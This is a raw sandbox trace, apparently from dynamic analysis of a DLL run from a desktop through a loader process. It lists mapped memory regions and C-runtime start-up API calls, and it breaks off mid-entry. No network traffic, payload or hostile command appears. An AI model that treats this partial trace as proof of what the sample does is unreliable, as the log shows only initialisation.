"msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 2368 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2369 start_va = 0x50000 end_va = 0x50fff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 2370 start_va = 0x450000 end_va = 0x550fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 2371 start_va = 0x560000 end_va = 0x115ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 2372 start_va = 0x72db0000 end_va = 0x72db2fff entry_point = 0x72db0000 region_type = mapped_file name = "api-ms-win-core-synch-l1-2-0.dll" filename = "\\Windows\\System32\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-synch-l1-2-0.dll") Region: id = 2373 start_va = 0x72ee0000 end_va = 0x72f24fff entry_point = 0x72ee0000 region_type = mapped_file name = "97328f~1.dll" filename = "\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll") Region: id = 2374 start_va = 0x762e0000 end_va = 0x762f8fff entry_point = 0x762e0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 2375 start_va = 0x76700000 end_va = 0x7679ffff entry_point = 0x76700000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 2376 start_va = 0x1200000 end_va = 0x134ffff entry_point = 0x0 region_type = private name = "private_0x0000000001200000" filename = "" Region: id = 2377 start_va = 0x77510000 end_va = 0x77544fff entry_point = 0x77510000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 2378 start_va = 0x762d0000 end_va = 0x762d5fff entry_point = 0x762d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 2379 start_va = 0x1200000 end_va = 0x132ffff entry_point = 0x0 region_type = private name = "private_0x0000000001200000" filename = "" Region: id = 2380 start_va = 0x1340000 end_va = 0x134ffff entry_point = 0x0 region_type = private name = "private_0x0000000001340000" filename = "" Thread: id = 112 os_tid = 0xcfc [0035.076] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x30f754 | out: lpSystemTimeAsFileTime=0x30f754*(dwLowDateTime=0xe2979b70, dwHighDateTime=0x1d3dfba)) [0035.076] GetCurrentProcessId () returned 0xcf8 [0035.076] GetCurrentThreadId () returned 0xcfc [0035.076] GetTickCount () returned 0x17e53 [0035.076] QueryPerformanceCounter (in: lpPerformanceCount=0x30f74c | out: lpPerformanceCount=0x30f74c*=373090659) returned 1 [0035.077] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0035.077] GetProcAddress (hModule=0x761d0000, lpProcName="FlsAlloc") returned 0x7622418d [0035.077] GetProcAddress (hModule=0x761d0000, lpProcName="FlsGetValue") returned 0x76221e16 [0035.077] GetProcAddress (hModule=0x761d0000, lpProcName="FlsSetValue") returned 0x762276e6 [0035.077] GetProcAddress (hModule=0x761d0000, lpProcName="FlsFree") returned 0x76221f61 [0035.077] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0035.077] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0035.077] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0035.077] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0035.077] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0035.078] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0035.078] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0035.078] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0035.078] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0035.078] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0035.078] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0035.078] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0035.078] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0035.078] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0035.078] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0035.078] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0035.079] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0035.079] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0035.079] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0035.079] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0035.079] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0035.079] GetCurrentThreadId () returned 0xcfc [0035.079] GetCommandLineA () returned="\"C:\\Windows\\System32\\goRcteXxZX.exe\" /dll=\"C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL\" /fn_id=DllGetClassObject /fn_args=\"explorer.exe\"" [0035.079] GetEnvironmentStringsW () returned 0xc79c0* [0035.079] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=992, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 992 [0035.079] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=992, lpMultiByteStr=0x13409f0, cbMultiByte=992, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 992 [0035.079] FreeEnvironmentStringsW (penv=0xc79c0) returned 1 [0035.079] GetStartupInfoA (in: lpStartupInfo=0x30f6a4 | out: lpStartupInfo=0x30f6a4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\goRcteXxZX.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0035.079] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0035.079] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0035.079] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0035.079] SetHandleCount (uNumber=0x20) returned 0x20 [0035.079] GetLastError () returned 0x0 [0035.080] SetLastError (dwErrCode=0x0) [0035.080] GetLastError () returned 0x0 [0035.080] SetLastError (dwErrCode=0x0) [0035.080] GetLastError () returned 0x0 [0035.080] SetLastError (dwErrCode=0x0) [0035.080] GetACP () returned 0x4e4 [0035.080] GetLastError () returned 0x0 [0035.080] SetLastError (dwErrCode=0x0) [0035.080] IsValidCodePage (CodePage=0x4e4) returned 1 [0035.080] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x30f684 | out: lpCPInfo=0x30f684) returned 1 [0035.080] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x30f150 | out: lpCPInfo=0x30f150) returned 1 [0035.080] GetLastError () returned 0x0 [0035.080] SetLastError (dwErrCode=0x0) [0035.080] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="", cchSrc=1, lpCharType=0x30f0e0 | out: lpCharType=0x30f0e0) returned 1 [0035.080] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x30f564, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0035.080] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x30f564, cbMultiByte=256, lpWideCharStr=0x30eec8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0035.080] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x30f164 | out: lpCharType=0x30f164) returned 1 [0035.080] GetLastError () returned 0x0 [0035.080] SetLastError (dwErrCode=0x0) [0035.080] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr="", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0035.080] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x30f564, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0035.080] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x30f564, cbMultiByte=256, lpWideCharStr=0x30ee98, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ矲狰Ā") returned 256 [0035.080] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ矲狰Ā", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0035.080] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ矲狰Ā", cchSrc=256, lpDestStr=0x30ec88, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0035.080] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchWideChar=256, lpMultiByteStr=0x30f464, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\x16}\\ô\x9cö0", lpUsedDefaultChar=0x0) returned 256 [0035.080] GetLastError () returned 0x0 [0035.080] SetLastError (dwErrCode=0x0) [0035.080] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x30f564, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0035.080] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x30f564, cbMultiByte=256, lpWideCharStr=0x30eeb8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ矲狰Ā") returned 256 [0035.080] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ矲狰Ā", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0035.080] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ矲狰Ā", cchSrc=256, lpDestStr=0x30eca8, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ") returned 256 [0035.080] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ", cchWideChar=256, lpMultiByteStr=0x30f364, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\x16}\\ô\x9cö0", lpUsedDefaultChar=0x0) returned 256 [0035.080] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72f1d9a8, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0035.081] GetLastError () returned 0x0 [0035.081] SetLastError (dwErrCode=0x0) [0035.081] GetLastError () returned 0x0 [0035.081] SetLastError (dwErrCode=0x0) [0035.081] GetLastError () returned 0x0 [0035.081] SetLastError (dwErrCode=0x0) [0035.081] GetLastError () returned 0x0 [0035.081] SetLastError (dwErrCode=0x0) [0035.081] GetLastError () returned 0x0 [0035.081] SetLastError (dwErrCode=0x0) [0035.081] GetLastError () returned 0x0 [0035.081] SetLastError (dwErrCode=0x0) [0035.081] GetLastError () returned 0x0 [0035.081] SetLastError (dwErrCode=0x0) [0035.081] GetLastError () returned 0x0 [0035.081] SetLastError (dwErrCode=0x0) [0035.081] GetLastError () returned 0x0 [0035.081] SetLastError (dwErrCode=0x0) [0035.081] GetLastError () returned 0x0 [0035.081] SetLastError (dwErrCode=0x0) [0035.081] GetLastError () returned 0x0 [0035.081] SetLastError (dwErrCode=0x0) [0035.081] GetLastError () returned 0x0 [0035.081] SetLastError (dwErrCode=0x0) [0035.081] GetLastError () returned 0x0 [0035.081] SetLastError (dwErrCode=0x0) [0035.081] GetLastError () returned 0x0 [0035.081] SetLastError (dwErrCode=0x0) [0035.081] GetLastError () returned 0x0 [0035.081] SetLastError (dwErrCode=0x0) [0035.081] GetLastError () returned 0x0 [0035.081] SetLastError (dwErrCode=0x0) [0035.081] GetLastError () returned 0x0 [0035.082] SetLastError (dwErrCode=0x0) [0035.082] GetLastError () returned 0x0 [0035.082] SetLastError (dwErrCode=0x0) [0035.082] GetLastError () returned 0x0 [0035.082] SetLastError (dwErrCode=0x0) [0035.082] GetLastError () returned 0x0 [0035.082] SetLastError (dwErrCode=0x0) [0035.082] GetLastError () returned 0x0 [0035.082] SetLastError (dwErrCode=0x0) [0035.082] GetLastError () returned 0x0 [0035.082] SetLastError (dwErrCode=0x0) [0035.082] GetLastError () returned 0x0 [0035.082] SetLastError (dwErrCode=0x0) [0035.082] GetLastError () returned 0x0 [0035.082] SetLastError (dwErrCode=0x0) [0035.082] GetLastError () returned 0x0 [0035.082] SetLastError (dwErrCode=0x0) [0035.082] GetLastError () returned 0x0 [0035.082] SetLastError (dwErrCode=0x0) [0035.082] GetLastError () returned 0x0 [0035.082] SetLastError (dwErrCode=0x0) [0035.082] GetLastError () returned 0x0 [0035.082] SetLastError (dwErrCode=0x0) [0035.082] GetLastError () returned 0x0 [0035.082] SetLastError (dwErrCode=0x0) [0035.082] GetLastError () returned 0x0 [0035.082] SetLastError (dwErrCode=0x0) [0035.082] GetLastError () returned 0x0 [0035.082] SetLastError (dwErrCode=0x0) [0035.082] GetLastError () returned 0x0 [0035.082] SetLastError (dwErrCode=0x0) [0035.082] GetLastError () returned 0x0 [0035.082] SetLastError (dwErrCode=0x0) [0035.082] GetLastError () returned 0x0 [0035.083] SetLastError (dwErrCode=0x0) [0035.083] GetLastError () returned 0x0 [0035.083] SetLastError (dwErrCode=0x0) [0035.083] GetLastError () returned 0x0 [0035.083] SetLastError (dwErrCode=0x0) [0035.083] GetLastError () returned 0x0 [0035.083] SetLastError (dwErrCode=0x0) [0035.083] GetLastError () returned 0x0 [0035.083] SetLastError (dwErrCode=0x0) [0035.083] GetLastError () returned 0x0 [0035.083] SetLastError (dwErrCode=0x0) [0035.083] GetLastError () returned 0x0 [0035.083] SetLastError (dwErrCode=0x0) [0035.083] GetLastError () returned 0x0 [0035.083] SetLastError (dwErrCode=0x0) [0035.083] GetLastError () returned 0x0 [0035.083] SetLastError (dwErrCode=0x0) [0035.083] GetLastError () returned 0x0 [0035.083] SetLastError (dwErrCode=0x0) [0035.083] GetLastError () returned 0x0 [0035.083] SetLastError (dwErrCode=0x0) [0035.083] GetLastError () returned 0x0 [0035.083] SetLastError (dwErrCode=0x0) [0035.083] GetLastError () returned 0x0 [0035.083] SetLastError (dwErrCode=0x0) [0035.083] GetLastError () returned 0x0 [0035.090] SetLastError (dwErrCode=0x0) [0035.090] GetLastError () returned 0x0 [0035.090] SetLastError (dwErrCode=0x0) [0035.090] GetLastError () returned 0x0 [0035.090] SetLastError (dwErrCode=0x0) [0035.090] GetLastError () returned 0x0 [0035.090] SetLastError 